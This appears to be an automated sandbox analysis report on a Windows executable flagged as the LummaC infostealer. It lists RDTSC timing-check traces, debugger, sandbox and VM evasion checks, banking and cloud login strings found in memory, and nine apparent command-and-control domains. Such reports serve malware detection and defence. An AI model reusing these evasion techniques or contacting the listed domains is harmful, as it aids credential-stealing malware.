                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55806CD second address: 55806D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 55806D2 second address: 55806FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F10525C05h 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007F9F10525BFAh 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580769 second address: 558077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED79Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 558077B second address: 5570E9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525BFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d jmp 00007F9F10525C06h 0x00000012 je 00007F9F81BD3AA7h 0x00000018 xor eax, eax 0x0000001a jmp 00007F9F104FF32Ah 0x0000001f pop esi 0x00000020 pop edi 0x00000021 pop ebx 0x00000022 leave 0x00000023 retn 0004h 0x00000026 nop 0x00000027 sub esp, 04h 0x0000002a mov esi, eax 0x0000002c xor ebx, ebx 0x0000002e cmp esi, 00000000h 0x00000031 je 00007F9F10525D35h 0x00000037 call 00007F9F14E32AB5h 0x0000003c mov edi, edi 0x0000003e jmp 00007F9F10525C05h 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 mov ax, D2F3h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570E9A second address: 5570E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570E9E second address: 5570F15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007F9F10525BFBh 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov al, 3Dh 0x00000014 jmp 00007F9F10525C01h 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov dh, cl 0x0000001f mov si, di 0x00000022 popad 0x00000023 push ebp 0x00000024 pushad 0x00000025 movzx esi, bx 0x00000028 jmp 00007F9F10525C03h 0x0000002d popad 0x0000002e mov dword ptr [esp], ecx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F9F10525C05h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570F15 second address: 5570F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5570F1B second address: 5570F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BCD second address: 5580BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BD1 second address: 5580BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BD7 second address: 5580BDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BDD second address: 5580BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580BE1 second address: 5580C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F112ED7A7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580C0F second address: 5580C27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F10525C04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580C27 second address: 5580C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580C2B second address: 5580CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9F10525BFEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F9F10525C00h 0x00000014 mov ebp, esp 0x00000016 jmp 00007F9F10525C00h 0x0000001b cmp dword ptr [76C8459Ch], 05h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ax, dx 0x00000028 pushfd 0x00000029 jmp 00007F9F10525C09h 0x0000002e adc ch, 00000046h 0x00000031 jmp 00007F9F10525C01h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580D49 second address: 5580D90 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F9F112ED79Dh 0x00000008 sub eax, 6CB3D326h 0x0000000e jmp 00007F9F112ED7A1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F9F112ED7A1h 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580D90 second address: 5580D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580D94 second address: 5580DAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DAE second address: 5580DEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9F10525BFDh 0x00000009 adc esi, 6AF3C496h 0x0000000f jmp 00007F9F10525C01h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9F10525BFCh 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DEA second address: 5580DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DF0 second address: 5580DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DF4 second address: 5580DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580DF8 second address: 5580E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d call 00007F9F10525C06h 0x00000012 push eax 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 jmp 00007F9F10525C07h 0x0000001a popad 0x0000001b pop eax 0x0000001c pushad 0x0000001d mov ax, 7ADBh 0x00000021 push eax 0x00000022 push edx 0x00000023 mov bx, cx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E41 second address: 5580E87 instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 call 00007F9F829924C0h 0x0000000c push 76C22B70h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov eax, dword ptr [esp+10h] 0x0000001c mov dword ptr [esp+10h], ebp 0x00000020 lea ebp, dword ptr [esp+10h] 0x00000024 sub esp, eax 0x00000026 push ebx 0x00000027 push esi 0x00000028 push edi 0x00000029 mov eax, dword ptr [76C84538h] 0x0000002e xor dword ptr [ebp-04h], eax 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 push dword ptr [ebp-08h] 0x0000003a mov eax, dword ptr [ebp-04h] 0x0000003d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000044 mov dword ptr [ebp-08h], eax 0x00000047 lea eax, dword ptr [ebp-10h] 0x0000004a mov dword ptr fs:[00000000h], eax 0x00000050 ret 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F9F112ED7A1h 0x0000005a jmp 00007F9F112ED79Bh 0x0000005f popfd 0x00000060 jmp 00007F9F112ED7A8h 0x00000065 popad 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E87 second address: 5580E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F10525BFEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E99 second address: 5580E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580E9D second address: 5580EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F9F10525BFAh 0x00000014 sub si, 1898h 0x00000019 jmp 00007F9F10525BFBh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007F9F10525C06h 0x00000026 pop ecx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580EE0 second address: 5580EFC instructions: 0x00000000 rdtsc 0x00000002 call 00007F9F112ED79Bh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [ebp-1Ch], esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ah, C6h 0x00000013 mov ecx, edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580EFC second address: 5580F02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580F02 second address: 5580F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5580F3A second address: 5580FA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9F10525BFFh 0x00000008 pop eax 0x00000009 mov dx, FF2Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test al, al 0x00000012 jmp 00007F9F10525BFBh 0x00000017 je 00007F9F81BB961Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push edi 0x00000021 pop eax 0x00000022 pushfd 0x00000023 jmp 00007F9F10525C07h 0x00000028 adc ecx, 7EEA738Eh 0x0000002e jmp 00007F9F10525C09h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B0A second address: 5590B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B0F second address: 5590B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F9F10525BFAh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F9F10525C07h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B3C second address: 5590B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9F112ED7A4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B54 second address: 5590B77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9F10525C06h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590B77 second address: 5590B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED79Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590D2F second address: 5590D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: 5590D33 second address: 5590D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSpecial instruction interceptor: First address: E323D3 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSpecial instruction interceptor: First address: C864D6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSpecial instruction interceptor: First address: E5CF37 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSpecial instruction interceptor: First address: C88A46 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe TID: 7824Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exe TID: 7868Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: fer4JIJGeL.exe, 00000000.00000002.1620112958.0000000000E14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000006003000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619487508.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621848347.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538416257.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnd
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: fer4JIJGeL.exe, 00000000.00000003.1608368655.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619487508.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621848347.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1619202286.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000002.1621698002.00000000017F7000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1569973357.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1538416257.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1464348690.0000000001835000.00000004.00000020.00020000.00000000.sdmp, fer4JIJGeL.exe, 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: fer4JIJGeL.exe, 00000000.00000002.1620112958.0000000000E14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: fer4JIJGeL.exe, 00000000.00000003.1489074088.0000000005FFE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: SICE
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                Source: fer4JIJGeL.exe, 00000000.00000003.1416826075.00000000053E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                Source: fer4JIJGeL.exe, 00000000.00000002.1620112958.0000000000E14000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: _Program Manager
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: fer4JIJGeL.exe, 00000000.00000003.1570110856.0000000001812000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
